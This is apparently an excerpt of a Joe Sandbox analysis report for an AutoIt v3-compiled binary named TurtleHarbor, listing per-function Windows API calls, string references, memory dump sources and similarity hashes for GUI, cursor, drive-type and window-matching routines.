GetStockObject.GDI32(00000011), ref: 00387E90
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00387E9B
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00387EA5

Strings

static, xrefs: 00387D67, 00387E7F
DISPLAY, xrefs: 00387D72
AutoIt v3, xrefs: 00387D15
msctls_progress32, xrefs: 00387E26

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 3799967ef2319270e99d8b2f09f57a053e1f83492cc8e14eebfba18cffacf758
Instruction ID: 4eb66397c332b03cc038cdf09aba43fc6c4b522536cf431598cf594e1fe723d0
Opcode Fuzzy Hash: 3799967ef2319270e99d8b2f09f57a053e1f83492cc8e14eebfba18cffacf758
Instruction Fuzzy Hash: A5A170B1A40615BFEB1ADBA4DC4AFAE7BBDEB49710F104155FA14A72E0D770AD00CB60

Function 0037B353 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0037B361
GetDriveTypeW.KERNEL32(?,003A2C4C,?,\\.\,003A0980), ref: 0037B43E
SetErrorMode.KERNEL32(00000000,003A2C4C,?,\\.\,003A0980), ref: 0037B59C

Strings

PhysicalDrive, xrefs: 0037B3EA
RAID, xrefs: 0037B53A
SSA, xrefs: 0037B525
1394, xrefs: 0037B51E
Unknown, xrefs: 0037B45E, 0037B502
iSCSI, xrefs: 0037B541
SCSI, xrefs: 0037B509
Fibre, xrefs: 0037B52C
ATAPI, xrefs: 0037B510
Network, xrefs: 0037B47C
USB, xrefs: 0037B533
Fixed, xrefs: 0037B486
RAMDisk, xrefs: 0037B468
\\.\, xrefs: 0037B3B3
SSD, xrefs: 0037B4C9
Virtual, xrefs: 0037B564
MMC, xrefs: 0037B55D
Removable, xrefs: 0037B490
FileBackedVirtual, xrefs: 0037B56B
SAS, xrefs: 0037B548
SATA, xrefs: 0037B54F
CDROM, xrefs: 0037B472
ATA, xrefs: 0037B517

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 68706a4126f7663f2f5d02ac2664d602350e62e2ec047e61562fa14017601cb4
Instruction ID: 99bb5e428f9eafaadffe4e48499f33852a22892434232bc018660b877c11dc82
Opcode Fuzzy Hash: 68706a4126f7663f2f5d02ac2664d602350e62e2ec047e61562fa14017601cb4
Instruction Fuzzy Hash: 9C516430B44209EBC727DB20CD42FA9F7B5AF46350B24C41DF80AEB691D779AE819B51

Function 0039A041 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 0039A0F7
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0039A1B0
SendMessageW.USER32(?,00001102,00000002,?), ref: 0039A1CC

Strings

0, xrefs: 0039A209

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 1a73266ddb3558af3ae6623b93fd410796abbd7f0459c01f82cc7667484186e2
Instruction ID: f7f6b0665f835958dc6368017ecdf21175b8fe6f210140ecce52ee513ae95d31
Opcode Fuzzy Hash: 1a73266ddb3558af3ae6623b93fd410796abbd7f0459c01f82cc7667484186e2
Instruction Fuzzy Hash: 2C02E230208B01AFDF1BCF14C849BAABBE8FF86314F05861DF995962A1C775D954CB92

Function 0039AF18 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0039AF51
SetTextColor.GDI32(?,?), ref: 0039AF55
GetSysColorBrush.USER32(0000000F), ref: 0039AF6B
GetSysColor.USER32(0000000F), ref: 0039AF76
CreateSolidBrush.GDI32(?), ref: 0039AF7B
GetSysColor.USER32(00000011), ref: 0039AF93
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0039AFA1
SelectObject.GDI32(?,00000000), ref: 0039AFB2
SetBkColor.GDI32(?,00000000), ref: 0039AFBB
SelectObject.GDI32(?,?), ref: 0039AFC8
InflateRect.USER32(?,000000FF,000000FF), ref: 0039AFE7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0039AFFE
GetWindowLongW.USER32(00000000,000000F0), ref: 0039B013
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0039B05F
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0039B086
InflateRect.USER32(?,000000FD,000000FD), ref: 0039B0A4
DrawFocusRect.USER32(?,?), ref: 0039B0AF
GetSysColor.USER32(00000011), ref: 0039B0BD
SetTextColor.GDI32(?,00000000), ref: 0039B0C5
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0039B0D9
SelectObject.GDI32(?,0039AC1F), ref: 0039B0F0
DeleteObject.GDI32(?), ref: 0039B0FB
SelectObject.GDI32(?,?), ref: 0039B101
DeleteObject.GDI32(?), ref: 0039B106
SetTextColor.GDI32(?,?), ref: 0039B10C
SetBkColor.GDI32(?,?), ref: 0039B116

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 1c118c0f6604b1744d86ba49414af34567b509ecd6d0a34dc50176e56c5028f1
Instruction ID: 59dd5bf02c28dcf8bebe2ece33995bace2660d4f974a5926b52c8b25c37515c3
Opcode Fuzzy Hash: 1c118c0f6604b1744d86ba49414af34567b509ecd6d0a34dc50176e56c5028f1
Instruction Fuzzy Hash: F8616CB1900218AFDF1A9FA4DC48EAEBB7DFF09320F114215F916AB2A1D7759940CF90

Function 00394ECC Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00395007
GetDesktopWindow.USER32 ref: 0039501C
GetWindowRect.USER32(00000000), ref: 00395023
GetWindowLongW.USER32(?,000000F0), ref: 00395085
DestroyWindow.USER32(?), ref: 003950B1
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003950DA
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003950F8
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0039511E
SendMessageW.USER32(?,00000421,?,?), ref: 00395133
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00395146
IsWindowVisible.USER32(?), ref: 00395166
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00395181
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00395195
GetWindowRect.USER32(?,?), ref: 003951AD
MonitorFromPoint.USER32(?,?,00000002), ref: 003951D3
GetMonitorInfoW.USER32(00000000,?), ref: 003951ED
CopyRect.USER32(?,?), ref: 00395204
SendMessageW.USER32(?,00000412,00000000), ref: 0039526F

Strings

0, xrefs: 00394FB2
(, xrefs: 003951E0
tooltips_class32, xrefs: 003950D3

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: c7d4ebe8ae33969a09b44327f46c105f6b1bdb01db412ca0d8cf256294ddd1dc
Instruction ID: 87363308096ce29951f9ad7b1364d07dcfae1bd55269e72c571f2b011dd68205
Opcode Fuzzy Hash: c7d4ebe8ae33969a09b44327f46c105f6b1bdb01db412ca0d8cf256294ddd1dc
Instruction Fuzzy Hash: 9DB19C71604740AFDB0ADF64D884B6ABBE4FF89314F008A1CF5999B2A1D771EC45CB92

Function 0037498A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 0037499C
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 003749C2
_wcscpy.LIBCMT ref: 003749F0
_wcscmp.LIBCMT ref: 003749FB
_wcscat.LIBCMT ref: 00374A11
_wcsstr.LIBCMT ref: 00374A1C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00374A38
_wcscat.LIBCMT ref: 00374A81
_wcscat.LIBCMT ref: 00374A88
_wcsncpy.LIBCMT ref: 00374AB3

Strings

StringFileInfo\, xrefs: 00374A0B
04090000, xrefs: 00374A6E
DefaultLangCodepage, xrefs: 00374A9B
\VarFileInfo\Translation, xrefs: 00374A30
%u.%u.%u.%u, xrefs: 00374B16

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 37bf6066b405e3955b2a0418d26c30f1a4975584b4ac1751b2c54642184f310e
Instruction ID: f0bbf7aedff2cdaa99120fc4619788a45f291f91813fdc8aa40b60fa852a5f29
Opcode Fuzzy Hash: 37bf6066b405e3955b2a0418d26c30f1a4975584b4ac1751b2c54642184f310e
Instruction Fuzzy Hash: 5B413672604214BADB27B7348C87EBFB77CDF46720F004459F909EA192EB35EA0197A5

Function 00312BA9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00312C8C
GetSystemMetrics.USER32(00000007), ref: 00312C94
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00312CBF
GetSystemMetrics.USER32(00000008), ref: 00312CC7
GetSystemMetrics.USER32(00000004), ref: 00312CEC
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00312D09
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00312D19
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00312D4C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00312D60
GetClientRect.USER32(00000000,000000FF), ref: 00312D7E
GetStockObject.GDI32(00000011), ref: 00312D9A
SendMessageW.USER32(00000000,00000030,00000000), ref: 00312DA5

Part of subcall function 00312714: GetCursorPos.USER32(?), ref: 00312727
Part of subcall function 00312714: ScreenToClient.USER32(003D77B0,?), ref: 00312744
Part of subcall function 00312714: GetAsyncKeyState.USER32(00000001), ref: 00312769
Part of subcall function 00312714: GetAsyncKeyState.USER32(00000002), ref: 00312777

SetTimer.USER32(00000000,00000000,00000028,003113C7), ref: 00312DCC

Strings

AutoIt v3 GUI, xrefs: 00312D44
h:, xrefs: 00312BEC, 0034C433

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI$h:
API String ID: 1458621304-2556057621
Opcode ID: 41ce5e83c171277a7db4502678d563c2b29d348f414b3f944c811470a9b41147
Instruction ID: 7c556bec8f6a8fa6c1349e3b1b91cdead829f43c6ebfcdb123a828017d4181d8
Opcode Fuzzy Hash: 41ce5e83c171277a7db4502678d563c2b29d348f414b3f944c811470a9b41147
Instruction Fuzzy Hash: 88B15075A0520ADFDB1ADFA8DD59BEE77B8FB08310F114129FA15AB290DB70A850CF50

Function 00330429 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON

Download Yara Rule

APIs

Part of subcall function 00321821: _memmove.LIBCMT ref: 0032185B

GetForegroundWindow.USER32(003A0980,?,?,?,?,?), ref: 003304E3
IsWindow.USER32(?), ref: 003666BB

Strings

HANDLE, xrefs: 0036649E
TITLE, xrefs: 00366650
REGEXPTITLE, xrefs: 003664B4
ACTIVE, xrefs: 00366488
INSTANCE, xrefs: 003665FA
REGEXPCLASS, xrefs: 00366506
LAST, xrefs: 00366472
ALL, xrefs: 00366622
CLASS, xrefs: 003664E5

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Window$Foreground_memmove
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 3828923867-1919597938
Opcode ID: f446de11e1bf7e9caaac015a761134fbac7d57ef04d21a39ed8b12b16e08ea8f
Instruction ID: dc63d973c3166612562914c28d611b311adbfd1382e0adb76c53143d70275ef7
Opcode Fuzzy Hash: f446de11e1bf7e9caaac015a761134fbac7d57ef04d21a39ed8b12b16e08ea8f
Instruction Fuzzy Hash: ADD1D630104602DBCB0BEF20D5929AAFBB8FF55384F108A1DF4968B566DB30E959CB91

Function 0039441F Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 003944AC
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 0039456C

Strings

DESELECT, xrefs: 0039465A
SELECTINVERT, xrefs: 0039463C
FINDITEM, xrefs: 003946DF
GETITEMCOUNT, xrefs: 003944DE
GETTEXT, xrefs: 00394515
SELECTCLEAR, xrefs: 003945EB
GETSUBITEMCOUNT, xrefs: 003944F7
SELECTALL, xrefs: 003945D3
GETSELECTED, xrefs: 0039469A
ISSELECTED, xrefs: 00394577
SELECT, xrefs: 00394606
GETSELECTEDCOUNT, xrefs: 0039454F
VIEWCHANGE, xrefs: 0039472B

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: f6cf9d3c40d28a8e093aa4487dbbecafd61c3241463409bb49962b79ad97c060
Instruction ID: 6299c0c0636333ac92039d6b529b6bbd4006e718d8a0fee1f0c3ae7eb46ba8a4
Opcode Fuzzy Hash: f6cf9d3c40d28a8e093aa4487dbbecafd61c3241463409bb49962b79ad97c060
Instruction Fuzzy Hash: DBA191702146019FCB1AEF64C961E6AB3A5EF89314F11892CF8569F7D2DB30EC06CB51

Function 003856C8 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 003856E1
LoadCursorW.USER32(00000000,00007F8A), ref: 003856EC
LoadCursorW.USER32(00000000,00007F00), ref: 003856F7
LoadCursorW.USER32(00000000,00007F03), ref: 00385702
LoadCursorW.USER32(00000000,00007F8B), ref: 0038570D
LoadCursorW.USER32(00000000,00007F01), ref: 00385718
LoadCursorW.USER32(00000000,00007F81), ref: 00385723
LoadCursorW.USER32(00000000,00007F88), ref: 0038572E
LoadCursorW.USER32(00000000,00007F80), ref: 00385739
LoadCursorW.USER32(00000000,00007F86), ref: 00385744
LoadCursorW.USER32(00000000,00007F83), ref: 0038574F
LoadCursorW.USER32(00000000,00007F85), ref: 0038575A
LoadCursorW.USER32(00000000,00007F82), ref: 00385765
LoadCursorW.USER32(00000000,00007F84), ref: 00385770
LoadCursorW.USER32(00000000,00007F04), ref: 0038577B
LoadCursorW.USER32(00000000,00007F02), ref: 00385786
GetCursorInfo.USER32(?), ref: 00385796
GetLastError.KERNEL32(00000001,00000000), ref: 003857C1

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 6c4b0a247579ef29570630406c7995ea11fb0d1910d64f0867dc301b9f427355
Instruction ID: 68c4ae216ab840938cfe8d3e5ca46672b3e1db2ea6ff637a498b7d901bb7e2b8
Opcode Fuzzy Hash: 6c4b0a247579ef29570630406c7995ea11fb0d1910d64f0867dc301b9f427355
Instruction Fuzzy Hash: 7E415370E04319AADF119FBA8C49D6EFEF8EF55B10B10452FE519E7291DAB8A400CF51

Function 0036B13A Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0036B17B
__swprintf.LIBCMT ref: 0036B21C
_wcscmp.LIBCMT ref: 0036B22F
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0036B284
_wcscmp.LIBCMT ref: 0036B2C0
GetClassNameW.USER32(?,?,00000400), ref: 0036B2F7
GetDlgCtrlID.USER32(?), ref: 0036B349
GetWindowRect.USER32(?,?), ref: 0036B37F
GetParent.USER32(?), ref: 0036B39D
ScreenToClient.USER32(00000000), ref: 0036B3A4
GetClassNameW.USER32(?,?,00000100), ref: 0036B41E
_wcscmp.LIBCMT ref: 0036B432
GetWindowTextW.USER32(?,?,00000400), ref: 0036B458
_wcscmp.LIBCMT ref: 0036B46C

Part of subcall function 0033385C: _iswctype.LIBCMT ref: 00333864

Strings

%s%u, xrefs: 0036B216

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 5e3a982b13eb944b3b9d922bc17f867a7fece07455da3d4bbe0fba700b20ecf9
Instruction ID: 71e1e7d9825e242bd80e4f5e03fe5e7ad2826ce7ef6e26ff05d14d9df722fa81
Opcode Fuzzy Hash: 5e3a982b13eb944b3b9d922bc17f867a7fece07455da3d4bbe0fba700b20ecf9
Instruction Fuzzy Hash: BAA1DC71204206ABD71BDF24C885BAAF7E8FF44354F108629F999C6195EB30E995CFA0

Function 0036BA6D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0036BAB1
_wcscmp.LIBCMT ref: 0036BAC2
GetWindowTextW.USER32(00000001,?,00000400), ref: 0036BAEA
CharUpperBuffW.USER32(?,00000000), ref: 0036BB07
_wcscmp.LIBCMT ref: 0036BB25
_wcsstr.LIBCMT ref: 0036BB36
GetClassNameW.USER32(00000018,?,00000400), ref: 0036BB6E
_wcscmp.LIBCMT ref: 0036BB7E
GetWindowTextW.USER32(00000002,?,00000400), ref: 0036BBA5
GetClassNameW.USER32(00000018,?,00000400), ref: 0036BBEE
_wcscmp.LIBCMT ref: 0036BBFE
GetClassNameW.USER32(00000010,?,00000400), ref: 0036BC26
GetWindowRect.USER32(00000004,?), ref: 0036BC8F

Strings

@, xrefs: 0036BA92
ThumbnailClass, xrefs: 0036BB79, 0036BBF9

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: ffccdab16f4859b7ace1ccd677018ba3d02da20b27b08f5c2aa4cf0a37d2c868
Instruction ID: 7469098f0acb22e533539b6b546202984b612fcff81f393cbad66a6ce4e58d90
Opcode Fuzzy Hash: ffccdab16f4859b7ace1ccd677018ba3d02da20b27b08f5c2aa4cf0a37d2c868
Instruction Fuzzy Hash: BE818C710042099BDB16DF14C985FAABBECEF54314F04C469FD89DA09ADB30DA85CFA1

Function 0036B8B6 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0036B915

Strings

HANDLE=, xrefs: 0036B90E
[LAST, xrefs: 0036B9C2
REGEXP=, xrefs: 0036B92A
[CLASS:, xrefs: 0036B965
CLASSNAME=, xrefs: 0036B952
[REGEXPTITLE:, xrefs: 0036B93D
ACTIVE, xrefs: 0036B8F0
[ALL, xrefs: 0036B9BB
LAST, xrefs: 0036B8DA
[HANDLE:, xrefs: 0036B921
ALL, xrefs: 0036B9A9
[ACTIVE, xrefs: 0036B902

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: __wcsnicmp
